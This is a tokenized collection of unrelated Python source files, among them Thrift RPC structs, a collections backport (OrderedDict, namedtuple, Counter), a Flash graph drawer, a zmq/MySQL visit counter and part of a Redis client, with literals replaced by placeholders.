iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . STRING : <EOL> self . success = iprot . readString ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . STRING , <NUM_LIT:0> ) <EOL> oprot . writeString ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class aliveSince_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class aliveSince_result : <EOL> """<STR_LIT>""" <EOL> thrift_spec = ( <EOL> ( <NUM_LIT:0> , TType . I64 , '<STR_LIT:success>' , None , None , ) , <EOL> ) <EOL> def __init__ ( self , success = None , ) : <EOL> self . success = success <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> if fid == <NUM_LIT:0> : <EOL> if ftype == TType . I64 : <EOL> self . success = iprot . readI64 ( ) ; <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> if self . success != None : <EOL> oprot . writeFieldBegin ( '<STR_LIT:success>' , TType . I64 , <NUM_LIT:0> ) <EOL> oprot . writeI64 ( self . success ) <EOL> oprot . writeFieldEnd ( ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class reinitialize_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) <EOL> class shutdown_args : <EOL> thrift_spec = ( <EOL> ) <EOL> def read ( self , iprot ) : <EOL> if iprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and isinstance ( iprot . trans , TTransport . CReadableTransport ) and self . thrift_spec is not None and fastbinary is not None : <EOL> fastbinary . decode_binary ( self , iprot . trans , ( self . __class__ , self . thrift_spec ) ) <EOL> return <EOL> iprot . readStructBegin ( ) <EOL> while True : <EOL> ( fname , ftype , fid ) = iprot . readFieldBegin ( ) <EOL> if ftype == TType . STOP : <EOL> break <EOL> else : <EOL> iprot . skip ( ftype ) <EOL> iprot . readFieldEnd ( ) <EOL> iprot . readStructEnd ( ) <EOL> def write ( self , oprot ) : <EOL> if oprot . __class__ == TBinaryProtocol . TBinaryProtocolAccelerated and self . thrift_spec is not None and fastbinary is not None : <EOL> oprot . trans . write ( fastbinary . encode_binary ( self , ( self . __class__ , self . thrift_spec ) ) ) <EOL> return <EOL> oprot . writeStructBegin ( '<STR_LIT>' ) <EOL> oprot . writeFieldStop ( ) <EOL> oprot . writeStructEnd ( ) <EOL> def validate ( self ) : <EOL> return <EOL> def __repr__ ( self ) : <EOL> L = [ '<STR_LIT>' % ( key , value ) <EOL> for key , value in self . __dict__ . iteritems ( ) ] <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , '<STR_LIT:U+002CU+0020>' . join ( L ) ) <EOL> def __eq__ ( self , other ) : <EOL> return isinstance ( other , self . __class__ ) and self . __dict__ == other . __dict__ <EOL> def __ne__ ( self , other ) : <EOL> return not ( self == other ) </s>
<s> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> from _abcoll import * <EOL> import _abcoll <EOL> __all__ += _abcoll . __all__ <EOL> from _collections import deque , defaultdict <EOL> from operator import itemgetter as _itemgetter , eq as _eq <EOL> from keyword import iskeyword as _iskeyword <EOL> import sys as _sys <EOL> import heapq as _heapq <EOL> from itertools import repeat as _repeat , chain as _chain , starmap as _starmap , ifilter as _ifilter , imap as _imap <EOL> class OrderedDict ( dict , MutableMapping ) : <EOL> '<STR_LIT>' <EOL> def __init__ ( self , * args , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise TypeError ( '<STR_LIT>' % len ( args ) ) <EOL> try : <EOL> self . __root <EOL> except AttributeError : <EOL> self . __root = root = [ None , None , None ] <EOL> PREV = <NUM_LIT:0> <EOL> NEXT = <NUM_LIT:1> <EOL> root [ PREV ] = root [ NEXT ] = root <EOL> self . __map = { } <EOL> self . update ( * args , ** kwds ) <EOL> def __setitem__ ( self , key , value , PREV = <NUM_LIT:0> , NEXT = <NUM_LIT:1> , dict_setitem = dict . __setitem__ ) : <EOL> '<STR_LIT>' <EOL> if key not in self : <EOL> root = self . __root <EOL> last = root [ PREV ] <EOL> last [ NEXT ] = root [ PREV ] = self . __map [ key ] = [ last , root , key ] <EOL> dict_setitem ( self , key , value ) <EOL> def __delitem__ ( self , key , PREV = <NUM_LIT:0> , NEXT = <NUM_LIT:1> , dict_delitem = dict . __delitem__ ) : <EOL> '<STR_LIT>' <EOL> dict_delitem ( self , key ) <EOL> link = self . __map . pop ( key ) <EOL> link_prev = link [ PREV ] <EOL> link_next = link [ NEXT ] <EOL> link_prev [ NEXT ] = link_next <EOL> link_next [ PREV ] = link_prev <EOL> def __iter__ ( self , NEXT = <NUM_LIT:1> , KEY = <NUM_LIT:2> ) : <EOL> '<STR_LIT>' <EOL> root = self . __root <EOL> curr = root [ NEXT ] <EOL> while curr is not root : <EOL> yield curr [ KEY ] <EOL> curr = curr [ NEXT ] <EOL> def __reversed__ ( self , PREV = <NUM_LIT:0> , KEY = <NUM_LIT:2> ) : <EOL> '<STR_LIT>' <EOL> root = self . __root <EOL> curr = root [ PREV ] <EOL> while curr is not root : <EOL> yield curr [ KEY ] <EOL> curr = curr [ PREV ] <EOL> def __reduce__ ( self ) : <EOL> '<STR_LIT>' <EOL> items = [ [ k , self [ k ] ] for k in self ] <EOL> tmp = self . __map , self . __root <EOL> del self . __map , self . __root <EOL> inst_dict = vars ( self ) . copy ( ) <EOL> self . __map , self . __root = tmp <EOL> if inst_dict : <EOL> return ( self . __class__ , ( items , ) , inst_dict ) <EOL> return self . __class__ , ( items , ) <EOL> def clear ( self ) : <EOL> '<STR_LIT>' <EOL> try : <EOL> for node in self . __map . itervalues ( ) : <EOL> del node [ : ] <EOL> self . __root [ : ] = [ self . __root , self . __root , None ] <EOL> self . __map . clear ( ) <EOL> except AttributeError : <EOL> pass <EOL> dict . clear ( self ) <EOL> setdefault = MutableMapping . setdefault <EOL> update = MutableMapping . update <EOL> pop = MutableMapping . pop <EOL> keys = MutableMapping . keys <EOL> values = MutableMapping . values <EOL> items = MutableMapping . items <EOL> iterkeys = MutableMapping . iterkeys <EOL> itervalues = MutableMapping . itervalues <EOL> iteritems = MutableMapping . iteritems <EOL> __ne__ = MutableMapping . __ne__ <EOL> def popitem ( self , last = True ) : <EOL> '''<STR_LIT>''' <EOL> if not self : <EOL> raise KeyError ( '<STR_LIT>' ) <EOL> key = next ( reversed ( self ) if last else iter ( self ) ) <EOL> value = self . pop ( key ) <EOL> return key , value <EOL> def __repr__ ( self ) : <EOL> '<STR_LIT>' <EOL> if not self : <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , self . items ( ) ) <EOL> def copy ( self ) : <EOL> '<STR_LIT>' <EOL> return self . __class__ ( self ) <EOL> @ classmethod <EOL> def fromkeys ( cls , iterable , value = None ) : <EOL> '''<STR_LIT>''' <EOL> d = cls ( ) <EOL> for key in iterable : <EOL> d [ key ] = value <EOL> return d <EOL> def __eq__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( other , OrderedDict ) : <EOL> return len ( self ) == len ( other ) and all ( _imap ( _eq , self . iteritems ( ) , other . iteritems ( ) ) ) <EOL> return dict . __eq__ ( self , other ) <EOL> def __del__ ( self ) : <EOL> self . clear ( ) <EOL> def namedtuple ( typename , field_names , verbose = False , rename = False ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( field_names , basestring ) : <EOL> field_names = field_names . replace ( '<STR_LIT:U+002C>' , '<STR_LIT:U+0020>' ) . split ( ) <EOL> field_names = tuple ( map ( str , field_names ) ) <EOL> if rename : <EOL> names = list ( field_names ) <EOL> seen = set ( ) <EOL> for i , name in enumerate ( names ) : <EOL> if ( not all ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) or _iskeyword ( name ) <EOL> or not name or name [ <NUM_LIT:0> ] . isdigit ( ) or name . startswith ( '<STR_LIT:_>' ) <EOL> or name in seen ) : <EOL> names [ i ] = '<STR_LIT>' % i <EOL> seen . add ( name ) <EOL> field_names = tuple ( names ) <EOL> for name in ( typename , ) + field_names : <EOL> if not all ( c . isalnum ( ) or c == '<STR_LIT:_>' for c in name ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> if _iskeyword ( name ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> if name [ <NUM_LIT:0> ] . isdigit ( ) : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> seen_names = set ( ) <EOL> for name in field_names : <EOL> if name . startswith ( '<STR_LIT:_>' ) and not rename : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> if name in seen_names : <EOL> raise ValueError ( '<STR_LIT>' % name ) <EOL> seen_names . add ( name ) <EOL> numfields = len ( field_names ) <EOL> argtxt = repr ( field_names ) . replace ( "<STR_LIT:'>" , "<STR_LIT>" ) [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> reprtxt = '<STR_LIT:U+002CU+0020>' . join ( '<STR_LIT>' % name for name in field_names ) <EOL> template = '''<STR_LIT>''' % locals ( ) <EOL> for i , name in enumerate ( field_names ) : <EOL> template += "<STR_LIT>" % ( name , i , i ) <EOL> if verbose : <EOL> print template <EOL> namespace = dict ( _itemgetter = _itemgetter , __name__ = '<STR_LIT>' % typename , <EOL> OrderedDict = OrderedDict , _property = property , _tuple = tuple ) <EOL> try : <EOL> exec template in namespace <EOL> except SyntaxError , e : <EOL> raise SyntaxError ( e . message + '<STR_LIT>' + template ) <EOL> result = namespace [ typename ] <EOL> try : <EOL> result . __module__ = _sys . _getframe ( <NUM_LIT:1> ) . f_globals . get ( '<STR_LIT>' , '<STR_LIT:__main__>' ) <EOL> except ( AttributeError , ValueError ) : <EOL> pass <EOL> return result <EOL> class Counter ( dict ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> self . update ( iterable , ** kwds ) <EOL> def __missing__ ( self , key ) : <EOL> '<STR_LIT>' <EOL> return <NUM_LIT:0> <EOL> def most_common ( self , n = None ) : <EOL> '''<STR_LIT>''' <EOL> if n is None : <EOL> return sorted ( self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) , reverse = True ) <EOL> return _heapq . nlargest ( n , self . iteritems ( ) , key = _itemgetter ( <NUM_LIT:1> ) ) <EOL> def elements ( self ) : <EOL> '''<STR_LIT>''' <EOL> return _chain . from_iterable ( _starmap ( _repeat , self . iteritems ( ) ) ) <EOL> @ classmethod <EOL> def fromkeys ( cls , iterable , v = None ) : <EOL> raise NotImplementedError ( <EOL> '<STR_LIT>' ) <EOL> def update ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> if isinstance ( iterable , Mapping ) : <EOL> if self : <EOL> self_get = self . get <EOL> for elem , count in iterable . iteritems ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + count <EOL> else : <EOL> dict . update ( self , iterable ) <EOL> else : <EOL> self_get = self . get <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) + <NUM_LIT:1> <EOL> if kwds : <EOL> self . update ( kwds ) <EOL> def subtract ( self , iterable = None , ** kwds ) : <EOL> '''<STR_LIT>''' <EOL> if iterable is not None : <EOL> self_get = self . get <EOL> if isinstance ( iterable , Mapping ) : <EOL> for elem , count in iterable . items ( ) : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - count <EOL> else : <EOL> for elem in iterable : <EOL> self [ elem ] = self_get ( elem , <NUM_LIT:0> ) - <NUM_LIT:1> <EOL> if kwds : <EOL> self . subtract ( kwds ) <EOL> def copy ( self ) : <EOL> '<STR_LIT>' <EOL> return Counter ( self ) <EOL> def __delitem__ ( self , elem ) : <EOL> '<STR_LIT>' <EOL> if elem in self : <EOL> dict . __delitem__ ( self , elem ) <EOL> def __repr__ ( self ) : <EOL> if not self : <EOL> return '<STR_LIT>' % self . __class__ . __name__ <EOL> items = '<STR_LIT:U+002CU+0020>' . join ( map ( '<STR_LIT>' . __mod__ , self . most_common ( ) ) ) <EOL> return '<STR_LIT>' % ( self . __class__ . __name__ , items ) <EOL> def __add__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem in set ( self ) | set ( other ) : <EOL> newcount = self [ elem ] + other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> def __sub__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem in set ( self ) | set ( other ) : <EOL> newcount = self [ elem ] - other [ elem ] <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> def __or__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> for elem in set ( self ) | set ( other ) : <EOL> p , q = self [ elem ] , other [ elem ] <EOL> newcount = q if p < q else p <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> def __and__ ( self , other ) : <EOL> '''<STR_LIT>''' <EOL> if not isinstance ( other , Counter ) : <EOL> return NotImplemented <EOL> result = Counter ( ) <EOL> if len ( self ) < len ( other ) : <EOL> self , other = other , self <EOL> for elem in _ifilter ( self . __contains__ , other ) : <EOL> p , q = self [ elem ] , other [ elem ] <EOL> newcount = p if p < q else q <EOL> if newcount > <NUM_LIT:0> : <EOL> result [ elem ] = newcount <EOL> return result <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from cPickle import loads , dumps <EOL> Point = namedtuple ( '<STR_LIT>' , '<STR_LIT>' , True ) <EOL> p = Point ( x = <NUM_LIT:10> , y = <NUM_LIT:20> ) <EOL> assert p == loads ( dumps ( p ) ) <EOL> class Point ( namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> __slots__ = ( ) <EOL> @ property <EOL> def hypot ( self ) : <EOL> return ( self . x ** <NUM_LIT:2> + self . y ** <NUM_LIT:2> ) ** <NUM_LIT:0.5> <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' % ( self . x , self . y , self . hypot ) <EOL> for p in Point ( <NUM_LIT:3> , <NUM_LIT:4> ) , Point ( <NUM_LIT> , <NUM_LIT:5> / <NUM_LIT> ) : <EOL> print p <EOL> class Point ( namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> '<STR_LIT>' <EOL> __slots__ = ( ) <EOL> _make = classmethod ( tuple . __new__ ) <EOL> def _replace ( self , _map = map , ** kwds ) : <EOL> return self . _make ( _map ( kwds . get , ( '<STR_LIT:x>' , '<STR_LIT:y>' ) , self ) ) <EOL> print Point ( <NUM_LIT:11> , <NUM_LIT> ) . _replace ( x = <NUM_LIT:100> ) <EOL> Point3D = namedtuple ( '<STR_LIT>' , Point . _fields + ( '<STR_LIT:z>' , ) ) <EOL> print Point3D . __doc__ <EOL> import doctest <EOL> TestResults = namedtuple ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> print TestResults ( * doctest . testmod ( ) ) </s>
<s> from flash . text . engine import ( TextElement , ElementFormat , FontDescription , <EOL> TextBlock ) <EOL> from graph import Colors <EOL> @ package ( '<STR_LIT>' ) <EOL> class Drawer : <EOL> def __init__ ( self , graph , sprite ) : <EOL> self . graph = graph <EOL> self . sprite = sprite <EOL> self . canvas = sprite . graphics <EOL> def color ( self , value ) : <EOL> if not value : <EOL> return <NUM_LIT:0> <EOL> if value . charAt ( <NUM_LIT:0> ) == '<STR_LIT:#>' : <EOL> return int ( '<STR_LIT>' + value . substring ( <NUM_LIT:1> ) ) <EOL> else : <EOL> return Colors . x11 [ value . toLowerCase ( ) ] <EOL> def draw ( self ) : <EOL> for node in values ( self . graph . nodes ) : <EOL> self [ '<STR_LIT>' + node . shape ] ( node ) <EOL> self . label_node ( node ) <EOL> for edge in values ( self . graph . edges ) : <EOL> self . draw_edge ( edge ) <EOL> def node_ellipse ( self , node ) : <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . beginFill ( self . color ( node . color ) ) <EOL> else : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( node . color ) ) <EOL> self . canvas . drawEllipse ( node . x - node . width * <NUM_LIT> , node . y - node . height * <NUM_LIT> , <EOL> node . width * <NUM_LIT> , node . height * <NUM_LIT> ) <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . endFill ( ) <EOL> def node_circle ( self , node ) : <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . beginFill ( self . color ( node . fillcolor ) ) <EOL> else : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( node . color ) ) <EOL> self . canvas . drawCircle ( node . x , node . y , node . width * <NUM_LIT> ) <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . endFill ( ) <EOL> def node_doublecircle ( self , node ) : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( node . color ) ) <EOL> self . canvas . drawCircle ( node . x , node . y , node . width * <NUM_LIT> ) <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . beginFill ( self . color ( node . fillcolor ) ) <EOL> self . canvas . drawCircle ( node . x , node . y , node . width * <NUM_LIT> - <NUM_LIT:4> ) <EOL> if node . style == '<STR_LIT>' : <EOL> self . canvas . endFill ( ) <EOL> def draw_edge ( self , edge ) : <EOL> self . canvas . lineStyle ( <NUM_LIT:1> , self . color ( edge . color ) ) <EOL> if self . startpoint : <EOL> self . canvas . moveTo ( edge . startpoint . x , edge . startpoint . y ) <EOL> self . canvas . lineTo ( edge . path [ <NUM_LIT:0> ] . x , edge . path [ <NUM_LIT:0> ] . y ) <EOL> else : <EOL> self . canvas . moveTo ( edge . path [ <NUM_LIT:0> ] . x , edge . path [ <NUM_LIT:0> ] . y ) <EOL> for i in range ( <NUM_LIT:1> , edge . path . length , <NUM_LIT:3> ) : <EOL> self . canvas . curveTo ( edge . path [ i ] . x , edge . path [ i ] . y , <EOL> ( edge . path [ i ] . x + edge . path [ i + <NUM_LIT:1> ] . x ) * <NUM_LIT:0.5> , <EOL> ( edge . path [ i ] . y + edge . path [ i + <NUM_LIT:1> ] . y ) * <NUM_LIT:0.5> ) <EOL> self . canvas . curveTo ( edge . path [ i + <NUM_LIT:1> ] . x , edge . path [ i + <NUM_LIT:1> ] . y , <EOL> edge . path [ i + <NUM_LIT:2> ] . x , edge . path [ i + <NUM_LIT:2> ] . y ) <EOL> self [ '<STR_LIT>' + edge . arrowhead ] ( self . color ( edge . color ) , <EOL> edge . path [ edge . path . length - <NUM_LIT:1> ] , edge . endpoint ) <EOL> def arrow_normal ( self , color , center , end ) : <EOL> dx = center . x - end . x <EOL> dy = center . y - end . y <EOL> s = <NUM_LIT> <EOL> c = <NUM_LIT> <EOL> ax = ( dx * c - dy * s ) * <NUM_LIT> <EOL> ay = ( dx * s + dy * c ) * <NUM_LIT> <EOL> s = - <NUM_LIT> <EOL> c = <NUM_LIT> <EOL> bx = ( dx * c - dy * s ) * <NUM_LIT> <EOL> by = ( dx * s + dy * c ) * <NUM_LIT> <EOL> self . canvas . beginFill ( color ) <EOL> self . canvas . moveTo ( end . x , end . y ) <EOL> self . canvas . lineTo ( end . x + ax , end . y + ay ) <EOL> self . canvas . lineTo ( center . x , center . y ) <EOL> self . canvas . lineTo ( end . x + bx , end . y + by ) <EOL> self . canvas . endFill ( ) <EOL> def label_node ( self , node ) : <EOL> font = FontDescription ( "<STR_LIT>" ) <EOL> format = ElementFormat ( font ) <EOL> format . fontSize = <NUM_LIT> <EOL> el = TextElement ( node . label or node . name , format ) <EOL> block = TextBlock ( ) <EOL> block . content = el <EOL> tl = block . createTextLine ( None , node . width * <NUM_LIT> ) <EOL> pos = node . label_pos <EOL> if not pos : <EOL> pos = node <EOL> tl . x = int ( pos . x - tl . width / <NUM_LIT:2> ) <EOL> tl . y = int ( pos . y + tl . height / <NUM_LIT:2> ) <EOL> self . sprite . addChild ( tl ) </s>
<s> import zmq <EOL> import MySQLdb <EOL> ctx = zmq . Context ( <NUM_LIT:1> ) <EOL> sock = ctx . socket ( zmq . REP ) <EOL> sock . connect ( '<STR_LIT>' ) <EOL> mysql = MySQLdb . connect ( host = '<STR_LIT:localhost>' , user = '<STR_LIT:test>' , db = '<STR_LIT>' ) <EOL> while True : <EOL> uri , = sock . recv_multipart ( ) <EOL> uri = uri . decode ( '<STR_LIT:utf-8>' ) <EOL> cur = mysql . cursor ( ) <EOL> cur . execute ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , uri ) <EOL> cur . execute ( "<STR_LIT>" , uri ) <EOL> for row in cur : <EOL> nvisits = row [ <NUM_LIT:0> ] <EOL> sock . send_multipart ( [ ( uri + '<STR_LIT:U+0020>' + str ( nvisits ) ) . encode ( '<STR_LIT:utf-8>' ) ] ) </s>
<s> import socket <EOL> import errno <EOL> from . core import gethub , Lock <EOL> from . import channel <EOL> from . util import setcloexec <EOL> convert = { <EOL> str : lambda a : a . encode ( '<STR_LIT:utf-8>' ) , <EOL> bytes : lambda a : a , <EOL> bytearray : lambda a : a , <EOL> int : lambda a : bytes ( str ( a ) , '<STR_LIT:utf-8>' ) , <EOL> float : lambda a : bytes ( repr ( a ) , '<STR_LIT:utf-8>' ) , <EOL> } <EOL> def encode_command ( buf , parts ) : <EOL> add = buf . extend <EOL> cvt = convert <EOL> add ( '<STR_LIT>' . format ( len ( parts ) ) . encode ( '<STR_LIT:ascii>' ) ) <EOL> for part in parts : <EOL> value = cvt [ part . __class__ ] ( part ) <EOL> add ( '<STR_LIT>' . format ( len ( value ) ) . encode ( "<STR_LIT:ascii>" ) ) <EOL> add ( value ) <EOL> add ( b'<STR_LIT:\r\n>' ) <EOL> return buf <EOL> class RedisError ( Exception ) : <EOL> pass <EOL> class RedisChannel ( channel . PipelinedReqChannel ) : <EOL> BUFSIZE = <NUM_LIT> <EOL> def __init__ ( self , host , port , unixsock , db ) : <EOL> super ( ) . __init__ ( ) <EOL> if unixsock : <EOL> self . _sock = socket . socket ( socket . AF_UNIX , socket . SOCK_STREAM ) <EOL> else : <EOL> self . _sock = socket . socket ( socket . AF_INET , <EOL> socket . SOCK_STREAM , socket . IPPROTO_TCP ) <EOL> setcloexec ( self . _sock ) <EOL> self . _sock . setblocking ( <NUM_LIT:0> ) <EOL> try : <EOL> if unixsock : <EOL> self . _sock . connect ( unixsock ) <EOL> else : <EOL> self . _sock . connect ( ( host , port ) ) <EOL> except socket . error as e : <EOL> if e . errno == errno . EINPROGRESS : <EOL> gethub ( ) . do_write ( self . _sock ) <EOL> else : <EOL> raise <EOL> self . _start ( ) <EOL> db = str ( db ) <EOL> assert self . request ( '<STR_LIT>' <EOL> . format ( len ( db ) , db ) . encode ( '<STR_LIT:ascii>' ) ) . get ( ) == '<STR_LIT:OK>' <EOL> def _close_channel ( self ) : <EOL> self . _sock . close ( ) <EOL> super ( ) . _close_channel ( ) <EOL> def sender ( self ) : <EOL> buf = bytearray ( ) <EOL> add_chunk = buf . extend <EOL> wait_write = gethub ( ) . do_write <EOL> while True : <EOL> if not buf : <EOL> self . wait_requests ( ) <EOL> if not self . _alive : <EOL> return <EOL> wait_write ( self . _sock ) <EOL> for chunk in self . get_pending_requests ( ) : <EOL> add_chunk ( chunk ) <EOL> try : <EOL> bytes = self . _sock . send ( buf ) <EOL> except socket . error as e : <EOL> if e . errno in ( errno . EAGAIN , errno . EINTR ) : <EOL> continue <EOL> else : <EOL> raise <EOL> if not bytes : <EOL> raise EOFError ( ) <EOL> del buf [ : bytes ] <EOL> def receiver ( self ) : <EOL> buf = bytearray ( ) <EOL> sock = self . _sock <EOL> wait_read = gethub ( ) . do_read <EOL> add_chunk = buf . extend <EOL> pos = [ <NUM_LIT:0> ] <EOL> def readmore ( ) : <EOL> while True : <EOL> wait_read ( sock ) 